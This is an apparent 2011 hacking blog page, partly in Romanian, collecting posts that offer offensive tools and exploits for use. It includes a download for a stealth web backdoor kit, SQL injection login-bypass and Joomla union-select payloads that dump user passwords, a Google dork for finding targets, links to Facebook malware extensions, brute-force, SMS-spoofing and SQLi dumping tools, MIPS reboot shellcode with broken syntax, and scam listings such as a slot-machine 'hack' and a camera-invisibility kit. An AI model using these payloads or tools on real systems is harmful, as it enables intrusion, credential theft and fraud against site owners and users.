Thursday, 22 December 2011

WeBaCoo (Web Backdoor Cookie) 0.2

WeBaCoo (Web Backdoor Cookie) is a web backdoor script-kit, aiming to provide a stealth terminal-like connection over HTTP between client and web server. It is a post exploitation tool capable to maintain access to a compromised web server. WeBaCoo was designed to operate under the radar of modern up-to-dated AV, NIDS, IPS, Network Firewalls and Application Firewalls, proving a stealth mechanism to execute system commands to the compromised server. The obfuscated communication is accomplished using HTTP header's Cookie fields under valid client HTTP requests and relative web server's responses.
Changes: Built in Tor proxy support. New random delimiter string for each request. Various other updates. System Unix
Download:  http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/webacoo-0.2.zip

Infoproject Biznis Heroj SQLi Authentication Bypass

Infoproject Biznis Heroj (login.php)
Authentication Bypass Vulnerability
Vendor: Infoproject DOO
Product web page: http://www.biznisheroj.mk
Affected version: Plus, Pro and Extra
Summary: Biznis Heroj or Business Herois the
first software on the Macedonian market that
will help you manage your business
processes in your company,such as accounting,
production,acquisition, archiving, inventory, and the Cloud. Using the Cloud
technology, Biznis Heroj allows you to access the system from any
computer at any time through any internet browser.
Desc: The vulnerability is caused due to an error in the logon
authentication script (login.php) and can be exploited to bypass
the login procedure by defining the 'username' and 'password' POST
parameters with an SQL Injection attack, gaining admin privileges.
Tested on: Apache, PHP
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            liquidworm gmail com
Vendor status:
[14.12.2011] Vulnerability discovered.
[15.12.2011] Contact with the vendor.
[20.12.2011] No response from the vendor.
[21.12.2011] Public security advisory released.
Advisory ID: ZSL-2011-5065
Advisory URL:
http://www.zeroscience.mk/en/vulnerabilities/ZSL-2011-5065.php
14.12.2011
---
PoC:
https://[TARGET]/login.php
Username: ' or 1=1--
Password: ' or 1=1--

Iran spy drone GPS hijack boasts: Rubbish, say experts U.S Drome captured in Iran is RQ-170 Sentinel


Doubts that Iran managed to bring down an advanced US drone over the country last month using an advanced GPS spoofing attack have been raised by experts, who say that attacks of this type would be extremely tough to pull off.
Iran announced on 4 December that it had captured an advanced American remotely piloted spy drone, thought to be an RQ-170 Sentinel, and proudly broadcast images of the captured kit on state TV. The images depicted a drone that was intact and showed little or no signs of damage.
The Islamic Republic initially claimed that its air forces shot the drone down after it encroached  on the country’s airspace near the Afghan border. Iran later claimed it was taken down by a sophisticated cyber-attack.  Days later an Iranian engineer said that this attack involved swamping the drone's GPS receivers with a rogue signal that tricked it into landing on autopilot in Iran instead of a US Air Force base.
The unnamed Iranian boffin told Christian Science Monitor that Iran developed the attack after reverse-engineering previously captured or shot down US drones, and by taking advantage inherent weaknesses in the GPS navigation system.
The US said the drone was lost on a mission in Western Afghanistan before conceding it was carrying out a covert spy operation over Iran. The US has asked for the return of the drone via Swiss authorities.

Facebook New Virus


A new FB Spam virus affect the Mozilla and Chrome Users.:http://babylucy.info/plugin.php
The Mozilla Firefox Virus can be found for the moment on:
http://informativenews.in/profile/firefox.xpi
the code can be downloaded from here:
http://www.multiupload.com/1QX7583JV4
Chrome version:
http://informativenews.in/profile/fb.crx
Atention this file contain virus installer's please dont run only [VIEW] or [EDIT]

Wednesday, 21 December 2011

Become invisible to CCD survaillance camera on traffic, ATM, bank, airports..and other

There is a 0 day method and kit to avoid the camera's on street or other locations. From this moment you wont be registered and marked with a code by London or Paris Camera traffic software and other ATM or Bank camera, what is all about?
The kit cost 1000 €uro full license, or 200 €uro for use for ten (10) times - demo kit, it's made by in China private supplier and come with 1 year warranty, 15 days delivery time after the payment was confirmed. Where i can order this ? Please contact us using the form contact on footer, down website page.
What contain the Kit? 
The kit have a football cap, that has under the visor (hood) tens of IR SMD LED that are controled by a smd controller in modulation and freqvency, foil of IR LED who transmit to the second part of the kit:
-a necklace with IR Receiver's controled by a controller that modulate and set the freqvency response, both part are using 3V Lithium Battery
-thr'd part is a transparent gel and invisible for human eye , an IR luminofor fluid who mask our face and respond to the IR light, this gel is the most important part of the system, this gel hide our identity. On demo kit the gel is provided only for ten time use, on full kit purchase the gel can be use on 10000 time, and has 2 liter volume.The gel is invisible for other people is visible only by camera objectives only on IR  Light, and your face will become a angel lightning image with no face, the IR nacklace can be also placed on hands. The camera can not view your face and the software cant interpret the map point to compare or search in a database, also the gesture soft are down. This come with no demo for secure the kit, and no more details will be provided, any good investment require risk for protect the buyer and his affiliates. Only what we warranty is the 15 day delivery time and the  good work of the elements of the kit in face of security cameras .The demo price  is available only until 31 december 2011

Tuesday, 20 December 2011

Free STEAM CS 1.6 Source


Free STEAM CS 1.6 Source
We are donate a free VALVE steam account, but only on private , please use our contact form down page on footer to request your Christmas Gift !
Out of stock ! Stocuri epuizate au fost 61 de cereri pentru 3 conturi steam.

SMTP Scanner

SMTP Scanner Perl Windows  / Linux
DOWNLOAD :
http://www.multiupload.com/9DL7HDSCHO

CLONE SMS, TRIMITE SMS CU NUMAR CLONAT FAKE

CLONE SMS, TRIMITE SMS CU NUMAR CLONAT FAKE
Poti trimite SMS catre oricine si orice tara, din orice tara si  de pe ce numar vrei cum vrei si ce vrei
Atat de zis multe de facut.
Fati cont pe smsglobal.com
utilizeaza aplicatia lor sau utilizeaza aplicatia asta daca ai un telefon mai vechi trebuie doar sa o transferi pe un server de hosting ce are curl activat.
DOWNLOAD
http://www.multiupload.com/0FM8ODMPWW

Admiral Novomatic Hack - versiunea 2010

Va punem la dispozitie o schema de joc pentru aparatele NOVOMATIC ADMIRAL din generatia 2009-2010, este testata merge sigur la beturi mici de pana in 30, nu merge in dublaje ci numai in generearea liniilor complete de castig, adica face aparatul sa acorde mai multe castiguri pe linii, cu 5 lei castigi garantat 30 lei daca aparatul este setat pe zero castig, se folosesc combinatii d etaste si timpi de asteptare. Exemplu introduc 5 lei in acceptorul de bancnote astept un timp de la 3 la 5 minute si pe urma incep sa joc,  la fel si cand se afiseaza culorile la rotatie. Pentru versiunea noua nu am nimic deocamdata  (hot spot platinum...etc)
Pentru comenzi se face plata in avans pe baza demonstratilor video se filmeaza aparatul nu calculator sau laptop, nu este smen impreuna cu patronul localului este perfect legala schema de joc ca la 6/49.
Pentru antrenament rulati urmatoarele fisiere in sandbox:
Sandboxie - http://www.sandboxie.com/SandboxieInstall.exe
si introduceti urmatoarele fisiere inauntru in sanbox :
http://www.multiupload.com/M1KX1910OR
astfel scapati de trialul nesuferit al celor de la aparate

Havij - program de extras date din bazele de date ale site - urilor

Havij Free License Download
Descarca gratuit Havij Free, nu necesita licenta
Havij este un program de extras datele pe care baza de date ale unui
website le detine, se pot afla adrese de email, conturi, numere de telefon,
parole si usernames, daca site-ul este vulnerabil SQLi , versiunile mai noi nu sunt asa de bune ca aceasta ele fiind comerciale si atat.
Descarca aici - Download Here : Download Havij Free

Joomla Component (com_dshop) SQL Injection



Google Dork : inurl:com_dshop
SQL Vulnerability:
http://127.0.0.1/[PATH]/index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12 (SQL)
SQL Exploit
+union+select+0,1,2,group_concat(username,0x3a,password),4,5,6,7+from+jos_users

Ubers AIO Downloader - Download From All FileHosters - Bypass 3 Surveys!

Presenting with my latest invention. This is AIO Premium Download which along with downloading from all free Premium file hosting & some other sites like Megaupload, rapidshare would also download from survey sites like Sharecash, Dengee & FileAce. Sounds awesome?
Now having official website of Ubers AIO Downloader:
http://www.sharecash-downloader.net/
Screenshots:







Video Of Working:




Updates:

  • Updated to v2.7, account error bug fixed.

=========================================
Updated Using & Installation Instructions (v2.6):
=========================================


1. Extract both files to any folder you wish.
2. Remember to have the .pdb file in the same folder as of downloader otherwise it would not work fine.

3. Please note that ShareCash has now changed their
file download link format, the new format is like:
http://sharecash.org/r/downloadpage/...d.php?file=239
Entering above link won't generate a premium link for it, instead
use the old URL method, like:
http://sharecash.org/download.php?file=239
and it should work fine. Here, 239 is the file id of the file.
==========================================
Description:
As mentioned in introduction, this will download from 3 major survey sites including Sharecash, Dengee & fileace and also from almost all free premium filehosting sites instantly.
Currently Supported File Hosting Sites:
  • Sharecash (Bypass SURVEY and downloads instantly)
  • Megaupload
  • Dengee (Bypass SURVEY and downloads instantly)
  • Letitbit
  • Fileace (Bypass SURVEY and downloads instantly)
  • 4Shared Freakshare Mediafire Megavideo Sendspace
  • Uploaded Datei.to Fileserve Badongo Usershare Share-Online
  • Load.to Unibytes Cramit Shragle Furk Uploadspace Hitfile
  • Uptobox Fileover Movbay Gigapeta Mixturevideo Loadfiles Uploadhere Crocko (Easy-Share.com)
  • FilefactoryVip-FileFreeMegapornNetloadFileSonicUploadingShareFlareExtabitTurbobitDailymotion
  • FilesendUgotfileSlingfileEnteruploadVidxdenUploadStationBuckshareTransitfiles
  • GoldfileYoutubeGigaUPVideozerWat.tvFilepostPyramidfilesCash-FileFiledinozShare
  • FilesMonsterEasyShareHotfileMegasharesRSUploadboxx7ZippyshareMegaporn Video
  • SimpleuploadMegashareGigasizeHellshareBatubia2SharedVideoBBBitshareFileapeWupload
  • KickloadVimeoFilekeenFilehookVidbuxFilejungleJakfile
How To Use:Just paste your download link in first textbox (refer to supported file hosters above) and then click generate button, copy the direct link in second text box and paste in web-browser or simple click download button for automatic download. More detailed instructions can be found inside the tool by clicking "How to use" button.
Download:
^For password to extract, open text file inside archive & download password from the specified download URL. Don't whine about surveys, this costs me & to keep it up this is necessary.
Also, I'd like to thank DevilMayCry for helping me with codes, very nice coder he is.
Thats it. Do leave feedbacks, if proxy gets blocked, I'd update it, let me know.
Enjoy.
Download rar file password from any of below three file-host.
1. Download from FileAce:
http://bit.ly/sWIJw5
OR:
2. Download from Dengee
http://bit.ly/vsCY3E
Or
3. Download password from Sharecash:
http://bit.ly/tg1TpY
Password:  m0o.OFu0CK3rN0VxTMaS
E foarte simplu de folosit:
-Introduceti numarul
-Setati numarul de mesaje
-Click pe start
Start Free Download

[VoIP-SiP] FRITZ!Box brute force


FRITZ!Box brute force nu stiu daca a mai fost postat sau nu dar este liber pe net, trebuie modificat putin pentru ca vine cu multe "goluri".
Download: http://www.multiupload.com/KPGIYOFUVS

Yahoo messenger Schimbare status free gratis - coduri sursa ymland



Codul sursa folosit de cei de la ymland pe care cer 5 parai..
Download:
http://www.multiupload.com/Q5D7E7QY59
plus multe alte tools-uri
Please scan this files and use for with your own risk may be infected.
Rog a se folosi un antivirus, utilizati aceste fisiere pe propria raspundere.

Linux Reboot Exploit Code Source SHELL


/*
 * Title: Linux/MIPS - reboot() - 32 bytes.
 */
 
#include <stdio.h>
 
char sc[] =          
         
"\x3c\x06\x43\x21"       // lui     a2,0x4321
         
"\x34\xc6\xfe\xdc"       // ori     a2,a2,0xfedc
         
"\x3c\x05\x28\x12"       // lui     a1,0x2812
         
"\x34\xa5\x19\x69"       // ori     a1,a1,0x1969
         
"\x3c\x04\xfe\xe1"       // lui     a0,0xfee1
         
"\x34\x84\xde\xad"       // ori     a0,a0,0xdead
         
"\x24\x02\x0f\xf8"       // li      v0,4088
         
"\x01\x01\x01\x0c";      // syscall 0x40404 
 
void main(void)
{
       
void(*s)(void);
       
printf("size: %d\n"sizeof(sc));
       
sc;
       
s();